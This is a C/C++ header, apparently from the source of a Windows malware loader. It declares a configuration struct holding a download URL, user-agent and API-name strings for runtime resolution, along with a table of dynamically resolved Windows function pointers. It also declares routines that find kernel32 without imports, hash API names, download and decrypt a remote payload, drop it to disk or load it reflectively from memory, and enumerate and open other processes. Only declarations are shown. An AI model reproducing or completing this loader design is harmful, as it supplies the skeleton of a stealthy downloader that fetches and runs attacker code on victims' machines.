#ifndef _LOADER_H
#define _LOADER_H

#include <Windows.h>
#include "winapi.h"

typedef struct _LOADER_CONFIG
{
	DWORD dwMagic;
	DWORD tls_validate;
	DWORD tls_validate_tail;
	CHAR strUrl[150];
	CHAR strKernel32[9];
	CHAR strNtDll[6];
	CHAR strWinInet[8];
	CHAR strShell32[8];
	CHAR strMsvcr[10];

	CHAR strGetModuleHandle[20];
	CHAR strVirtualAlloc[13];
	CHAR strVirtualProtect[15];

	CHAR strCreateFileA[12];
	CHAR strWriteFile[10];
	CHAR strCloseHandle[12];
	CHAR strGetShortPathNameW[18];
	CHAR strGetTempPathW[13];
	CHAR strSHGetKnownFolderPath[21];
	CHAR strLoadLibraryW[13];
	CHAR strFreeLibrary[12];
	CHAR strDeleteFileW[12];
	CHAR strGetFileSize[12];
	CHAR strCreateFileMappingA[20];
	CHAR strMapViewOfFile[20];
	CHAR strSetEndOfFile[20];
	CHAR strSetFilePointer[20];
	CHAR strUnmapViewOfFile[20];
	CHAR strGetLastError[20];
	CHAR strFormatMessage[20];
	CHAR strCreateToolHelp32Snapshot[30];
	CHAR strProcess32First[20];
	CHAR strProcess32Next[20];
	CHAR strGetCurrentProcessId[20];
	CHAR strDuplicateHandle[20];
	CHAR strOpenProcess[18];
	CHAR strGetCurrentProcess[18];

	CHAR strInternetOpenA[14];
	CHAR strInternetOpenUrlA[17];
	CHAR strInternetConnectA[17];
	CHAR strHttpOpenRequestA[17];
	CHAR strHttpQueryInfoW[15];
	CHAR strInternetReadFileExA[20];
	CHAR strInternetSetOption[20];
	CHAR strInternetQueryOption[21];
	CHAR strHttpSendRequest[20];
	CHAR strInternetCloseHandle[21];
	CHAR strWtoi[6];
	CHAR strAtoi[6];
	CHAR strExitProcess[12];
	CHAR strExitThread[11];
	CHAR strCreateThread[20];

	CHAR strOutputDebugStringA[19];
	CHAR strWaitForSingleObject[20];
	
	CHAR strVerSetConditionMask[20];
	CHAR strVerifyVersionInfoA[20];
	CHAR strMalloc[10];
	CHAR strCalloc[10];
	CHAR strFree[10];
	CHAR strSprintf[10];

	CHAR strGET[4];
	CHAR strNULL[1];
	CHAR strHTTP10[12];
	int  strSlash;

	CHAR strOS61[4];
	CHAR strOS62[4];
	CHAR strOS63[4];
	CHAR ssl_first_part[70];
	CHAR ssl_second_part[70];

	CHAR strUserAgent[187];
	CHAR basis_64[65];
	UCHAR pr2six[256];
} LOADER_CONFIG, *PLOADER_CONFIG;


typedef struct _VTABLE
{
	PLOADER_CONFIG lpLoaderConfig;

	GETPROCADDRESS GetProcAddress;
	LOADLIBRARYA LoadLibraryA;
	GETMODULEHANDLE fpGetModuleHandleA;
	VIRTUALALLOC VirtualAlloc;
	VIRTUALPROTECT VirtualProtect;
	CREATEFILEA CreateFileA;
	WRITEFILE WriteFile;
	GETFILESIZE fpGetFileSize;
	CREATEFILEMAPPINGA fpCreateFileMappingA;
	MAPVIEWOFFILE fpMapViewOfFile;
	SETENDOFFILE fpSetEndOfFile;
	SETFILEPOINTER fpSetFilePointer;
	UNMAPVIEWOFFILE fpUnmapViewOfFile;
	GETLASTERROR fpGetLastError;
	FORMATMESSAGE fpFormatMessage;
	CLOSEHANDLE CloseHandle;
	GETSHORTPATHNAMEW GetShortPathNameW;
	GETTEMPPATHW GetTempPathW;
	SHGETKNOWNFOLDERPATH SHGetKnownFolderPath;
	LOADLIBRARYW LoadLibraryW;
	FREELIBRARY FreeLibrary;
	DELETEFILEW DeleteFileW;
	INTERNETOPENA InternetOpenA;
	INTERNETOPENURLA InternetOpenUrlA;
	INTERNETREADFILEEXA InternetReadFileExA;
	INTERNETCONNECTA InternetConnectA;
	HTTPOPENREQUESTA HttpOpenRequestA;
	HTTPQUERYINFOA HttpQueryInfoA;
	WTOI wtoi;
	ATOI atoi;
	EXITPROCESS ExitProcess;
	EXITTHREAD ExitThread;
	CREATETHREAD CreateThread;
	OUTPUTDEBUGSTRINGA fpOutputDebugStringA;
	WAITFORSINGLEOBJECT fpWaitForSingleObject;
	INTERNETSETOPTION InternetSetOption;
	INTERNETQUERYOPTION InternetQueryOption;
	HTTPSENDREQUEST HttpSendRequest;
	INTERNETCLOSEHANDLE InternetCloseHandle;

	CREATETOOLHELP32SNAPSHOT fpCreateToolHelp32Snapshot;
	PROCESS32FIRST fpProcess32First;
	PROCESS32NEXT  fpProcess32Next;
	GETCURRENTPROCESSID fpGetCurrentProcessId;
	DUPLICATEHANDLE fpDuplicateHandle;
	OPENPROCESS fpOpenProcess;
	GETCURRENTPROCESS fpGetCurrentProcess;


	VERSETCONDITIONMASK fpVerSetConditionMask;
	VERIFYVERSIONINFOA fpVerifyVersionInfoA;

	/* msvcrt */
	MALLOC fpMalloc;
	CALLOC fpCalloc;
	FREE fpFree;
	SPRINTF fpSprintf;

} VTABLE, *PVTABLE;

#define CALC_OFFSET(type, ptr, offset) (type) (((ULONG64) ptr) + offset)
#define CALC_OFFSET_DISP(type, base, offset, disp) (type)((DWORD)(base) + (DWORD)(offset) + disp)
#define CALC_DISP(type, offset, ptr) (type) (((ULONG64) offset) - (ULONG64) ptr)

typedef struct base_relocation_block
{
	DWORD PageRVA;
	DWORD BlockSize;
} base_relocation_block_t;

typedef struct base_relocation_entry
{
	WORD offset : 12;
	WORD type : 4;
} base_relocation_entry_t;

typedef int (WINAPI *CRTMAIN)(DWORD);
typedef int (WINAPI *CRTMAIN64)(DWORD64);
typedef int (WINAPI *EXPORT)();
typedef int (WINAPI *EXPORT2)(DWORD);

extern "C" VOID Startup();
extern "C" VOID Loader(__in PLOADER_CONFIG lpLoaderConfig, __in PVOID aes_key);
extern "C" BOOL LoadVTable(__out PVTABLE lpTable);
extern "C" BOOL GetPointers(__out PGETPROCADDRESS fpGetProcAddress, __out PLOADLIBRARYA fpLoadLibraryA, __out PHANDLE pKernel32);
extern "C" HANDLE GetKernel32Handle();
extern "C" DWORD GetStringHash(__in LPVOID lpBuffer, __in BOOL bUnicode, __in UINT uLen);
extern "C" LPBYTE DownloadAndDecryptTls(PVTABLE lpTable, LPSTR strUrl, LPDWORD dwFileLen, DWORD dwXorKey, BOOL bXored);
extern "C" BOOL DownloadFile(__in PVTABLE lpTable, __in HINTERNET hUrl, __in LPBYTE lpBuffer, __in DWORD dwBufferLen);
extern "C" LPBYTE Decrypt(__in PVTABLE lpTable, __in LPBYTE lpBuffer, __in DWORD dwBuffLen, __in DWORD dwXorKey);
int Base64decode(__in PVTABLE lpTable, char *bufplain, const char *bufcoded);

//#ifdef LOAD_FROM_DISK
LPWSTR GetDropPath(__in PVTABLE lpTable);
LPWSTR DropFile(__in PVTABLE lpTable, __in LPBYTE lpFileBuffer, __in DWORD dwFileSize);
//#else
extern "C" LPVOID _LoadLibrary(__in PVTABLE lpTable, __in LPVOID lpRawBuffer, __out LPVOID *lpExport);
//#endif


// CRT
extern "C" LPVOID __MEMCPY__(__in LPVOID lpDst, __in LPVOID lpSrc, __in DWORD dwCount);
extern "C" VOID __MEMSET__(__in LPVOID p, __in CHAR cValue, __in DWORD dwSize);
extern "C" UINT __LSTRLEN(CHAR *str);
extern "C" char* __STRCHR__(const char *s, int c);
char * __STRSTR__(char *in,char *str);

#endif